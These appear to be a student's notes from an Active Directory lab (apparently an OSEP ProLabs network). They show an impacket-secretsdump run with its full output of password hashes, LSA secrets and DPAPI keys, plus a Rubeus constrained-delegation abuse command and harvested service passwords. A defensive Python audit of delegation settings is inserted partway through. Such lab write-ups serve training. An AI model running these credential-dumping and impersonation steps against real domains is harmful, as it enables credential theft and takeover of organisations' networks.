Got access to the database link.

Got creds for svc_sql:

username: svc_sql
hash: e04c4ef54a1a6f4e4fc0de22f0b5fb2d
password: m3c.local\svc_sql:ef8Mahvae2j1

┌──(remo㉿Remo)-[~/Offsec/OSEP/ProLabs/Cybernetics]
└─$ proxychains -q impacket-secretsdump m3c.local/svc_sql:''@10.9.20.11 -hashes :e04c4ef54a1a6f4e4fc0de22f0b5fb2d
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x2aa1b3c2027d47c1a8432f8d2e455268
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:499a6ee61a43b250ee988b9d34e3c95f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
remo:1001:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
[*] Dumping cached domain logon information (domain/username:hash)
M3C.LOCAL/Administrator:$DCC2$10240#Administrator#5c7435888a64e08c8bab7d82947fcb54: (2024-03-13 12:29:35)
M3C.LOCAL/svc_sql:$DCC2$10240#svc_sql#5fc66e8b320b1d2e75ca81cfa4e4a36d: (2024-11-29 06:00:01)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
M3C\M3SQLW$:aes256-cts-hmac-sha1-96:f1fd7d6f22b308de0f838bc56e54069bf822de8054d0555f1cbb9072aace9429
M3C\M3SQLW$:aes128-cts-hmac-sha1-96:d7ec3b6a6112a29454919903b8082aba
M3C\M3SQLW$:des-cbc-md5:ef9885490ea29e64
M3C\\M3SQLW$:plain_password_hex:400066006900640054007000280028007a004c007a002c00560072007a0029005b004e0040003e003c0024003e00770054002400380023004e005a00600028004c0054004c00400059005d006000350074003a0052002e007900390036006c00360058002b003300590055004c00520075003d0044005f00430032003c003c002c0070005c003a00400077002a0076002b00440048005300520033006000650068004d0023002800710038006d004600640037003b004d002f007200250034002a004f007400530050006e0074007300700036004b003900400062004f004b0031005f00670071006b00500045007500
M3C\M3SQLW$:aad3b435b51404eeaad3b435b51404ee:a09cbeb5c0e16d1e926c5b3d884949a4:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x4246de325df11b035c75ae3855b435de60d18cd7
dpapi_userkey:0x75bd3ff4aa4d5c2ee4694a2d43b7d8af2c6d78a7
[*] NL$KM 
 0000   D8 33 7F 7B A3 2C DE 15  CF B4 9A 10 37 3F 6B A9   .3.{.,......7?k.
 0010   4E 49 46 70 57 27 E8 1E  E8 A9 11 A8 1D EF 19 0C   NIFpW'..........
 0020   CC 43 92 F3 9C C7 51 1A  06 56 6D 60 DA 73 22 74   .C....Q..Vm`.s"t
 0030   81 EC B4 9F 69 FC 6A 8A  C8 52 E6 F5 03 56 0D 59   ....i.j..R...V.Y
NL$KM:d8337f7ba32cde15cfb49a10373f6ba94e4946705727e81ee8a911a81def190ccc4392f39cc7511a06566d60da73227481ecb49f69fc6a8ac852e6f503560d59
[*] _SC_MSSQL$SQLEXPRESS 
m3c.local\svc_sql:ef8Mahvae2j1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Now let’s abuse the constrained delegation.

Abused:

Rubeus.exe s4u /user:svc_sql /aes256:DC34E2C3A61B51A3D4F4E119A220E13EB575BAB477977802C1F8CAD4ED89FDCF /impersonateuser:Micheal.Crosley /domain:m3c.local /msdsspn:time/m3webaw.m3c.local /dc:m3dc.m3c.local /altservice:http /nowrap
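
A defender-side audit of the delegation setting abused above, as an added example that is not part of the original notes: it flags accounts with msDS-AllowedToDelegateTo set, reports exposure per host rather than per service class (the /altservice swap from time to http shows why), and lists which accounts remain impersonable. All directory records are constructed; tier0.admin, svc_backup and files01.example.local are hypothetical, and svc_sql having protocol transition enabled is an assumption.

```python
# Added example: audit delegation exposure from an exported set of directory records.
NOT_DELEGATED = 0x100000                    # "sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2Self)

# Constructed records; only svc_sql's SPN and Micheal.Crosley's name come from the notes.
ACCOUNTS = [
    {"name": "svc_sql", "uac": 0x200 | TRUSTED_TO_AUTH_FOR_DELEGATION,  # assumed flag
     "delegate_to": ["time/m3webaw.m3c.local"], "protected_users": False},
    {"name": "Micheal.Crosley", "uac": 0x200, "delegate_to": [], "protected_users": False},
    {"name": "tier0.admin", "uac": 0x200 | NOT_DELEGATED,  # hypothetical account
     "delegate_to": [], "protected_users": True},
    {"name": "svc_backup", "uac": 0x200,  # hypothetical account
     "delegate_to": ["cifs/files01.example.local:445"], "protected_users": False},
]

def spn_host(spn):
    """Host part of service/host[:port][/name], lower-cased."""
    parts = spn.split("/")
    return parts[1].split(":")[0].lower() if len(parts) > 1 else ""

def delegation_findings(accounts):
    """One finding per account whose msDS-AllowedToDelegateTo list is non-empty."""
    findings = []
    for acct in accounts:
        if not acct["delegate_to"]:
            continue
        transition = bool(acct["uac"] & TRUSTED_TO_AUTH_FOR_DELEGATION)
        findings.append({
            "account": acct["name"],
            # The service class in a ticket is not integrity-protected, so the
            # listed class (e.g. time/) does not bound the exposure: report hosts.
            "hosts": sorted({spn_host(s) for s in acct["delegate_to"]}),
            "protocol_transition": transition,
            "severity": "high" if transition else "medium",
        })
    return findings

def impersonable(accounts):
    """Accounts a delegating service can still act as: not sensitive, not Protected Users."""
    return sorted(a["name"] for a in accounts
                  if not (a["uac"] & NOT_DELEGATED) and not a["protected_users"])

if __name__ == "__main__":
    for f in delegation_findings(ACCOUNTS):
        print(f)
    print("impersonable:", impersonable(ACCOUNTS))
```

Accounts that drop out of the impersonable list are the ones marked sensitive or placed in Protected Users, which is the control that keeps a delegating service account from acting as them.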

Now getting the username and password from ActiveMQ on m3web:

activemq.username=system
activemq.password=manager
guest.password=password

Logged in to Apache ActiveMQ:

username: admin
password: 3f18DV^t!svBV4ntcrLRTWi2XaMCDK

Got access to the Apache service:

username: svc_apache
password: ef8Mahvae2j2
hash: b266d8902ae30ec65abdfbe28d34c819 
